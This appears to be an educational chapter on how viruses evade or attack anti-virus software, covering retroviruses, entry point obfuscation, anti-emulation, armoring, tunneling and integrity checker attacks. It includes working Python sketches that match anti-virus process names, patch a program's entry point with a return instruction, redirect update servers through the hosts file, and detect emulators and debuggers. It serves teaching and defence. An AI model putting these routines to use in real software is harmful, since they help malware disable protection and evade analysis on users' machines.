Anti-Anti-Virus Techniques

All viruses self-replicate, but not all viruses act in an openly hostile way towards anti-virus software. Anti-anti-virus techniques are techniques used by viruses which do one of three things:

  1. Aggressively attack anti-virus software.
  2. Try to make analysis difficult for anti-virus researchers.
  3. Try to avoid being detected by anti-virus software, using knowledge of how anti-virus software works.

The lack of clear definitions in this field comes into play again: arguably, any of the encryption methods is an attempt to achieve the latter two goals. To further confuse matters, "anti-anti-virus" is different from "anti-virus virus."

Anti-virus virus has been used variously to describe: a virus that attacks other viruses; anti-virus software that propagates itself through viral means; software which drops viruses on a machine, then offers to sell "anti-virus" software to remove the viruses it put there.

Back to the relatively well-defined anti-anti-virus, this includes seven techniques: retroviruses, entry point obfuscation, anti-emulation, armoring, tunneling, integrity checker attacks, and avoidance.

Retroviruses

A virus that actively tries to disable anti-virus software running on an infected machine is referred to as a retrovirus. This is a generic term for a virus employing this type of active defense, and doesn't imply that any particular technique is used.

Having said that, a common retrovirus technique is for a virus to carry a list with it of process names used by anti-virus products. When it infects a machine, a retrovirus will enumerate the currently-running processes, and kill off any processes which match one of the names in the list. A partial list is shown below:

Avgw.exe F-Prot.exe Navw32.exe Regedit.exe Scan32.exe Zonealarm.exe

It's not unusual to see lists like this appear in malware analyses. This particular list includes not only anti-virus process names, but also other security products like firewalls, and system utilities like the Windows Registry editor.
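The matching logic can be sketched as below. The kill list and the process snapshot here are illustrative; a real retrovirus would enumerate running processes through an OS API such as CreateToolhelp32Snapshot on Windows.

```python
# Sketch of retrovirus-style process matching (detection logic only).
# The snapshot is hypothetical; a real retrovirus would enumerate live
# processes through an OS API rather than take a list as input.

KILL_LIST = {
    "avgw.exe", "f-prot.exe", "navw32.exe",
    "regedit.exe", "scan32.exe", "zonealarm.exe",
}

def targets(running_processes):
    """Return running process names that match the kill list.

    Matching is case-insensitive, since Windows filenames are."""
    return [name for name in running_processes
            if name.lower() in KILL_LIST]

# Example: two of these hypothetical processes match the list.
snapshot = ["explorer.exe", "Navw32.exe", "notepad.exe", "ZoneAlarm.exe"]
print(targets(snapshot))  # ['Navw32.exe', 'ZoneAlarm.exe']
```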

A more aggressive retrovirus can target the anti-virus software on disk as well as in memory, so that anti-virus protection is disabled even after the infected system is rebooted.

For example, Ganda kills processes that appear to be anti-virus software, using the above list-based method; it also examines the programs run at system startup, looking for anti-virus software using the same list of names.

If Ganda finds anti-virus software during this examination, it locates the executable image on disk and replaces the first instruction with a "return" instruction. This causes the anti-virus software to exit immediately after starting. The above methods have one major drawback: by killing off the anti-virus software, they leave a telltale sign.
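Ganda's on-disk patch can be sketched at the byte level. Treating the entry point as a simple file offset is a simplification made here for illustration; a real attack would parse the executable's headers (e.g., a PE file's AddressOfEntryPoint) to find where the first instruction lives.

```python
# Sketch: disable a program on disk by overwriting the instruction at its
# entry point with an x86 "ret" (0xC3), as Ganda reportedly did. The
# entry point is taken to be a known file offset for simplicity; real
# code would locate it by parsing the executable's headers.

X86_RET = 0xC3

def patch_entry_with_ret(path, entry_offset=0):
    with open(path, "r+b") as f:
        f.seek(entry_offset)
        f.write(bytes([X86_RET]))
```

With this patch in place, the victim program returns to its caller immediately after starting, which is exactly the "exits immediately" behavior described above.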

An alert user might notice the absence of the anti-virus icon. For the purposes of retroviruses, it's sufficient to render anti-virus software incapable of full operation, disabling it rather than killing it off completely. How can this be done?

One approach would be to try and starve anti-virus software of CPU time. A retrovirus with appropriate permission could reduce the priority of anti-virus software to the minimum value possible, to (ideally) keep it from running.

Most operating system schedulers have a mechanism to boost the priority of CPU-starved processes, however, so attacking anti-virus software by reducing process priority is unlikely to be very effective.

Another way to disable anti-virus software is to adjust the way a computer looks up hostname information on the network, to prevent anti-virus software from being able to connect to the anti-virus company's servers and update its database.
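One way to implement this is to add a bogus entry to the system's hosts file, which most resolvers consult before DNS. The sketch below uses a hypothetical vendor hostname and takes the hosts-file path as a parameter; on Windows the real file lives under %SystemRoot%\System32\drivers\etc\hosts.

```python
# Sketch: block anti-virus updates by redirecting the vendor's update
# server to the loopback address via a hosts-file entry. The hostname is
# hypothetical, and the path is parameterized for illustration.

def block_update_server(hosts_path, hostname="update.av-vendor.example"):
    with open(hosts_path, "a") as f:
        f.write(f"\n127.0.0.1 {hostname}\n")
```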

Entry Point Obfuscation

Modifying an executable's start address, or the code at the original start address, constitutes extremely suspicious behavior for anti-virus heuristics. A virus can try to get control elsewhere instead; this is called entry point obfuscation or EPO.

Picking a random location in an executable to gain control isn't a brilliant survival strategy, because an infrequently-executed error handler may be chosen as easily as a frequently-executed loop. A more controlled selection of a location is better.

Simile and Ganda both use EPO, and look for calls to the ExitProcess API function; these calls are overwritten to point to the viral code instead. Because ExitProcess is called when a program wants to quit, these viruses get control upon the infected code's exit. Locations for EPO may also be chosen by looking for known code sequences in executables.

Compilers for high-level languages emit repetitive code, and a virus can search the executable for such repetitive instruction sequences to overwrite with a jump to the virus' code. As the sequence being replaced is known, the virus can always restore and run the original instructions later.
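This kind of patch can be sketched at the byte level. The "known sequence" below is just a common x86 function prologue chosen for illustration, and the jump is encoded as a 5-byte relative jmp (opcode 0xE9); the original bytes are saved so they can be restored and executed later, as the text describes.

```python
import struct

# Sketch of entry point obfuscation: find a known compiler-emitted byte
# sequence and overwrite it with a 5-byte relative jump to the viral
# code, saving the original bytes for later restoration. The pattern is
# a common x86 prologue, used purely as an example.

PROLOGUE = bytes([0x55, 0x8B, 0xEC, 0x83, 0xEC])  # push ebp; mov ebp,esp; sub esp,...

def plant_jump(image, virus_offset):
    """Return (patched_image, patch_offset, saved_bytes), or None if the
    known sequence isn't present in the image."""
    off = image.find(PROLOGUE)
    if off < 0:
        return None
    saved = image[off:off + 5]
    # rel32 is measured from the end of the 5-byte jump instruction.
    rel32 = virus_offset - (off + 5)
    patch = b"\xE9" + struct.pack("<i", rel32)
    return image[:off] + patch + image[off + 5:], off, saved
```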

Anti-Emulation

Techniques to avoid anti-virus emulators can be divided into three categories, based on whether they try to outlast, outsmart, or overextend the emulator. The fix for the latter two categories is just to improve the emulator, although this tends to come at the cost of increased emulator complexity.

Outlast

Except in an anti-virus lab, the amount of time an emulator has to spend running a program is strictly limited by the user's patience. How can a virus evade detection long enough for the emulator to give up?

  • Code can be added to the virus which does nothing, wasting time until the emulator quits - then the real viral code can run. The emulator may look for obvious junk code, so the code would need to be disguised as a valid operation, like computing the first n digits of π.
  • A virus need not replicate every time it's run. It can act benign nine times out of every ten, for example, in a statistical ploy to appear harmless 90% of the time. If the anti-virus software is using performance-improving tricks, then the virus might get lucky and have an infected program be marked as clean when emulated; a later execution of that infected program would give the virus a free hand.
  • Emulators operate under the assumption that viral code will intercept execution at or near the start of an infected program. Entry point obfuscation, besides being an anti-heuristic measure, can also be considered an anti-emulation technique, because it can delay execution of viral code.
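The "disguised as a valid operation" idea from the first bullet can be sketched as a genuine computation of digits of π. The implementation below uses Gibbons' unbounded spigot algorithm; any legitimate-looking but unnecessary calculation would serve the same time-wasting purpose.

```python
# Sketch of disguised time-wasting code: rather than obvious junk, the
# virus performs a legitimate-looking computation - generating the first
# n decimal digits of pi with Gibbons' unbounded spigot algorithm - in
# the hope of outlasting an emulator's time budget.

def pi_digits(n):
    digits = []
    q, r, t, k, m, x = 1, 0, 1, 1, 3, 3
    while len(digits) < n:
        if 4 * q + r - t < m * t:
            digits.append(m)
            q, r, m = (10 * q, 10 * (r - m * t),
                       (10 * (3 * q + r)) // t - 10 * m)
        else:
            q, r, t, k, m, x = (q * k, (2 * q + r) * x, t * x, k + 1,
                                (q * (7 * k + 2) + r * x) // (t * x), x + 2)
    return digits

print(pi_digits(6))  # [3, 1, 4, 1, 5, 9]
```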

Outsmart

An alternative to waiting until emulator scrutiny is over is to restructure the viral code so that it doesn't look suspicious when it's emulated. The decryptor code could be spread all over, instead of appearing as one tight loop; multiple decryption passes could be used to decrypt the virus body. Most techniques for avoiding dynamic heuristics would be candidates here.
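The multiple-pass idea can be sketched with two XOR passes under different keys; the keys and "body" are illustrative. An emulator that gives up after watching one decryption loop never sees plaintext, because the body only appears after the second pass.

```python
# Sketch of multiple decryption passes: the body becomes plaintext only
# after two separate XOR passes with different (illustrative) keys, which
# in a real virus could be separated by unrelated-looking code.

KEY1, KEY2 = 0x5A, 0xC3

def xor_pass(data, key):
    return bytes(b ^ key for b in data)

body = b"viral payload (illustrative)"
encrypted = xor_pass(xor_pass(body, KEY1), KEY2)

stage1 = xor_pass(encrypted, KEY2)   # still ciphertext after pass one
plaintext = xor_pass(stage1, KEY1)   # body revealed only now
print(plaintext == body)  # True
```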

Overextend

A virus can push the boundaries of an emulator in an effort to either crash the emulator - not likely for a mature anti-virus emulator - or detect that the virus is being run under emulation, so that the virus can take appropriate (in)action. Here are some ways to try and overextend an emulator:

  • Some CPUs, especially CISC ones, have undocumented instructions. A virus can use these instructions in the hopes that an emulator will not support them, and thus give itself away.
  • The same idea can be applied to bugs that a CPU may exhibit, or differences between different processor implementations. The emulator may need to track results that are processor-dependent to correctly emulate such a virus.
  • The emulator's memory system can be exercised by trying to access unusual locations that, on a real machine, might cause a memory fault or access some memory-mapped I/O. A cruder attack may simply try to exhaust an emulator's memory by accessing lots of locations. Memory system attacks are not particularly effective, however.
  • Assuming emulators return fixed values for calls to many operating system and other API functions, a virus can check for differences between two calls of the same function where a change should occur. For example, a virus could ask for the current time twice, assuming an emulated environment will return the same value both times.
  • An emulator may be taxed by importing obscure, but standard, libraries in case the emulator doesn't handle all of them.
  • External resources are next to impossible to properly emulate. A virus could take advantage of this by looking for external things like web pages.
  • Finally, checks specific to certain emulators can be performed. An emulator may only support a well-known set of I/O devices, or may have an interface to the "outside world" which can be tested for.
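The timing check described above (asking for the current time twice) can be sketched as follows. This is a minimal sketch: it assumes the emulator returns a fixed clock value, and a well-built emulator could defeat it simply by advancing its virtual clock.

```python
import time

# Sketch of the timing check: read a clock twice with some intervening
# work, and treat identical readings as a sign that a fixed value is
# being returned - i.e., that we may be running under an emulator.

def looks_emulated():
    t1 = time.perf_counter_ns()
    _ = sum(range(10_000))   # some intervening work
    t2 = time.perf_counter_ns()
    return t2 == t1          # identical readings -> suspicious
```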

Armoring

A virus is said to be armored if it uses techniques which try to make analysis hard for anti-virus researchers. In particular, anti-debugging methods can be used against dynamic analysis, and anti-disassembly methods can be used to slow static analysis. Interestingly, these techniques have been in use since at least the 1980s to guard against software piracy.

Anti-Debugging

Making dynamic analysis a painful process for humans is the realm of anti-debugging. These techniques target peculiarities of how debuggers work. This is a last gasp, though - if the viral code is already being analyzed in a debugger, then its survival time is dwindling.

If the goal is to annoy the human analyst, then the best bet in survival terms is to follow a false trail when a debugger is detected, and avoid any viral behavior. There are three weak points in a debugger that can be used to detect its presence: idiosyncrasies, breakpoints, and single-stepping.

  • Debugger-specific idiosyncrasies. As with emulators, debuggers won't present a program being debugged with an environment identical to its normal environment, and a virus can look for quirks of known debuggers.
  • Debugger breakpoints. Debuggers implement breakpoints by modifying the program being debugged, inserting special breakpoint instructions at points where the debugger wants to regain control. Typical breakpoint instructions cause the CPU to trap to an interrupt service routine.

A virus can look for signs of debugging by being introspective: it can examine its own code for breakpoint instructions. Since the virus may use external library code where debugger breakpoints can be set, breakpoint instructions can also be looked for at the entry points to library API functions.
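The introspective scan can be sketched as a search for the x86 INT3 opcode (0xCC). The byte strings here stand in for the virus' own image in memory; note that this naive scan can also misfire, since 0xCC may legitimately occur inside instruction operands.

```python
# Sketch of breakpoint detection: scan a region of "code" for the x86
# INT3 breakpoint opcode (0xCC). The byte strings are illustrative; a
# real virus would examine its own in-memory image. The scan is naive:
# 0xCC can also appear as operand data in clean code.

INT3 = 0xCC

def breakpoints_in(code):
    return [i for i, b in enumerate(code) if b == INT3]

clean    = bytes([0x55, 0x8B, 0xEC, 0x90, 0xC3])
debugged = bytes([0x55, 0xCC, 0xEC, 0x90, 0xC3])  # debugger planted INT3
print(breakpoints_in(clean), breakpoints_in(debugged))  # [] [1]
```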

More generally, a virus can look for any changes to itself. From the virus' point of view, a change is an error, and there are two distinct possibilities for dealing with errors: error detection and error correction.

Error detection, like the use of checksums or CRCs, would tell the virus whether or not a change had occurred to it, and the virus could take action accordingly. On the other hand, error correction not only detects errors, but is able to repair a finite number of them.

A robust virus would imply the use of error correction over error detection - this would guard against transmission errors and keep casual would-be virus writers from modifying the virus, and also be able to remove debugger breakpoint instructions.
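The error-detection side can be sketched with a CRC self-check; the "body" bytes are illustrative. Error correction would require a real error-correcting code such as Hamming or Reed-Solomon and is not shown.

```python
import zlib

# Sketch of self-checking via error detection: the virus stores a CRC of
# its own body and re-checks it at run time. A mismatch means something
# (perhaps a debugger breakpoint) has modified the code. The body bytes
# are illustrative stand-ins for real code.

body = bytes([0x55, 0x8B, 0xEC, 0x90, 0xC3])
STORED_CRC = zlib.crc32(body)

def tampered(current_body):
    return zlib.crc32(current_body) != STORED_CRC

print(tampered(body))                                    # False
print(tampered(bytes([0x55, 0xCC, 0xEC, 0x90, 0xC3])))   # True
```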

  • Single-stepping. Debuggers trace through code, instruction by instruction, using the single-stepping facilities available in many CPUs. After each instruction is executed, the CPU posts an interrupt which the debugger handles.

Anti-Disassembly

Any of the code obfuscation techniques used by polymorphic and metamorphic viruses are anti-disassembly techniques, but only in a weak sense. There are two goals for strong anti-disassembly:

  1. Disassembly should not be easily automated; the valuable time of an expert human should be required to make sense of the code.
  2. The full code should not be available until such time as the code actually runs.

To make automation difficult, a virus' code can make use of problems which are computationally very hard to solve. It turns out that the simple trick of mixing code and data is one such problem: precise separation of the two is known to be unsolvable.

In general, a virus may be structured so that separating code and data is also impossible - this can be done by using instructions as data values and vice versa. A careful mix of code and data may even throw off human analysis temporarily.

Anti-disassembly techniques are not solely for irritating human anti-virus researchers. They can also be seen as a defense against anti-virus software using static heuristics.

Tunneling

Anti-virus software may monitor calls to the operating system's API to watch for suspicious activity. A tunneling virus is one that traces through the code for API functions the virus uses, to ensure that execution will end up at the "right" place, i.e., the virus isn't being monitored.

If the virus does detect monitoring, tunneling allows the monitoring to be bypassed. An interesting symmetry is that the defensive technique in this case is exactly the same as the offensive technique: tracing through the API code.

The code "tracing" necessary for tunneling can be implemented by viruses in several ways, all of which resemble anti-virus techniques. A static analysis method would scan through the code, looking for control flow changes. Dynamic methods would single-step through the code being traced, or use full-blown emulation.
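The static flavor can be sketched as jump-chasing: starting at an API entry point, follow relative jumps until genuine code is reached, skipping over any hook that merely prepends a jump. The sketch handles only the x86 "jmp rel32" encoding (0xE9) over a byte buffer; real code has many more control transfers to consider.

```python
import struct

# Sketch of static tunneling: follow a chain of x86 "jmp rel32" (0xE9)
# instructions from an API entry point until non-jump code is reached.
# Only the 0xE9 encoding is handled, for illustration.

def tunnel(image, offset):
    while image[offset] == 0xE9:
        rel32 = struct.unpack_from("<i", image, offset + 1)[0]
        offset = offset + 5 + rel32   # target is relative to next insn
    return offset

# A hypothetical hooked entry: jmp -> jmp -> genuine code at offset 17.
image = bytearray(32)
image[0:5]   = b"\xE9" + struct.pack("<i", 5)  # offset 0  -> offset 10
image[10:15] = b"\xE9" + struct.pack("<i", 2)  # offset 10 -> offset 17
image[17] = 0x55                               # genuine code (push ebp)
print(tunnel(image, 0))  # 17
```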

Tunneling can only be done when the code in question can be read, obviously. For operating systems without strong memory protection between user processes and the operating system, like MS-DOS, tunneling is an effective technique.

Many operating systems do distinguish between user space and kernel space, though, a barrier which is crossed by a trap-based operating system API. In other words, the kernel's code cannot be read by user processes.

Surprisingly, tunneling can still be useful, because most high-level programming languages don't call the operating system directly, but call small library stubs that do the dirty work - these stubs can be tunneled into.

Anti-virus software can dodge this issue if it installs itself into the operating system kernel. (This is also a desirable goal for viruses, because a virus in the kernel would control the machine completely.)

Integrity Checker Attacks

In terms of anti-anti-virus techniques, integrity checkers warrant some careful handling, because they are able to catch any file change at all, not just suspicious code. Stealth viruses have a big advantage against integrity checkers: a stealth virus can hide file changes completely, so the checker never sees them.

Companion viruses are effective against integrity checkers for the same reason, because no changes to the infected file are ever seen. Stealth viruses can also infect when a file is read, so the act of computing a checksum by an integrity checker will itself infect a file.

In that case, the viral code would be included in the checksum without any alarm being raised. Similarly, a "slow" virus can infect only when a file is about to be legitimately changed anyway.

The infection doesn't need to be immediate, so long as any alert that the integrity checker pops up appears soon after the legitimate change; a user is likely to dismiss the alert as a false positive.

Finally, integrity checkers may have flaws that can be exploited. In one classic case, deleting the integrity checker's database of checksums caused the checker to faithfully recompute checksums for all files!
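The classic flaw can be demonstrated with a toy checker; the file contents and checksum scheme (CRC32) are illustrative. If the checksum database is missing, this checker silently rebuilds a fresh baseline, so a virus that deletes the database after infecting files is never flagged.

```python
import zlib

# Toy integrity checker exhibiting the classic flaw described above: a
# missing checksum database is treated as "first run," so the checker
# faithfully recomputes checksums - re-blessing any infected files.

class NaiveChecker:
    def __init__(self):
        self.db = None                      # {filename: crc}

    def scan(self, files):
        """files: {filename: bytes}. Returns names of changed files."""
        crcs = {name: zlib.crc32(data) for name, data in files.items()}
        if self.db is None:                 # the flaw: rebuild, don't alarm
            self.db = crcs
            return []
        return [n for n, c in crcs.items() if self.db.get(n) != c]

checker = NaiveChecker()
checker.scan({"app.exe": b"clean code"})            # establish baseline
print(checker.scan({"app.exe": b"infected code"}))  # ['app.exe'] - caught
checker.db = None                                   # virus deletes database
print(checker.scan({"app.exe": b"infected code"}))  # [] - re-blessed
```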

Avoidance

Those who admit to remembering the Karate Kid movies will know that the best way to avoid a punch is not to be there. The same principle applies to anti-anti-virus techniques. A virus can hide in places where anti-virus software doesn't look.

If anti-virus software only checks the hard drive, infect USB keys and floppies; if anti-virus software doesn't examine all file types, infect those file types; if files with special names aren't checked, infect files with those names.

Unusual types of file archive formats may temporarily escape unpacking and scrutiny, too. In general, avoidance is not particularly effective as a strategy, though.